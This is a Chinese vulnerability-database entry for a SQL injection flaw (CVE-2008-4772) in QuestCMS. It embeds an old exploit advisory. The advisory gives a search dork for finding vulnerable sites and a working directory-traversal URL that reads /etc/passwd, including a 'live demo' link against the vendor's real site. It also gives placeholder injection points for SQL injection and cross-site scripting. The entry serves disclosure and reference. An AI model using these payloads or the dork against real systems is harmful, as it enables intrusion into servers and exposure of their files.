Questwork QuestCMS 'main.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116504 漏洞类型 SQL注入
发布时间 2008-10-27 更新时间 2009-01-29
CVE编号 CVE-2008-4772 CNNVD-ID CNNVD-200810-481
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/6853
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200810-481
|漏洞详情
QuestCMS中的main/main.php存在SQL注入漏洞,允许远程攻击者借助obj参数执行任意的SQL指令。
|漏洞EXP
--------------------------------------------------------------------------------

Title : Questcms Multiple Remote Vulnerabilities [XSS/Directory Traversal/sql]

--------------------------------------------------------------------------------
#Author: d3b4g


#contact: bl4ckend[at]gmail[dot]com

--------------------------------------------------------------------------------
Affected software:
--------------------------------------------------------------------------------
Application :  Questwork Web Content Management system (QuestCMS)
URL :  http://www.questwork.com

--------------------------------------------------------------------------------

dork        : allinurl:"/questcms/"
--------------------------------------------------------------------------------
Directory traversal vulnibility
=============================
Exploit     : questcms/main/main.php?lang=tc&page=1&theme=../../../../../../../../etc/passwd%00.html

Live demo   : http://www.questwork.com/questcms/main/main.php?lang=tc&page=1&theme=../../../../../../../../etc/passwd%00.html


---------------------------------------------------------------------------------

sql injection:
==============
Vuln file:questcms/main/main.php?obj=[sql]


XSS:
====
exploit:/main/main.php?cx=[Xss]
--------------------------------------------------------------------------------



--------------------------------------------------------------------------------

greetz:

All my friends,milw0rm...

--------------------------------------------------------------------------------



--------------------------------- [ www.hotlism.org ] --------------------------------------

# milw0rm.com [2008-10-27]
|参考资料

来源:XF
名称:questcms-main-sql-injection(46150)
链接:http://xforce.iss.net/xforce/xfdb/46150
来源:BID
名称:31945
链接:http://www.securityfocus.com/bid/31945
来源:MILW0RM
名称:6853
链接:http://www.milw0rm.com/exploits/6853
来源:SREASON
名称:4523
链接:http://securityreason.com/securityalert/4523